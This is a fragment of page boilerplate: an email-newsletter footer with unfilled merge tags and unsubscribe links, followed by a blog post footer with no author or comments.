This email was sent to *|EMAIL|*
why did I get this?    unsubscribe from this list    update subscription preferences
*|LIST:ADDRESSLINE|*

Posted by at No comments:
Subscribe to: Comments (Atom)